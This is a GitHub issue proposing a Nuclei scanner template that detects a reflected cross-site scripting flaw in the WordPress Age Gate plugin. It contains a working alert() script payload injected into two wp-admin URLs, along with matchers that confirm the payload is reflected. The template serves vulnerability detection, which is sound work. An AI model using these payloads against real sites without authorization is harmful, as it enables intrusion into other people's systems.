### ISSUE TITLE
Age Gate < 2.20.4 - Reflected Cross-Site Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4642]
```yaml
id: age-gate-xss

info:
  name: Age Gate < 2.20.4 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/a13148fe-ffc9-4003-a44d-652624ba5535
  tags: xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin.php?page=age-gate&a"><script>alert(document.domain)</script>'
      - '{{BaseURL}}/wp-admin/admin.php?page=age-gate-addons&a"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
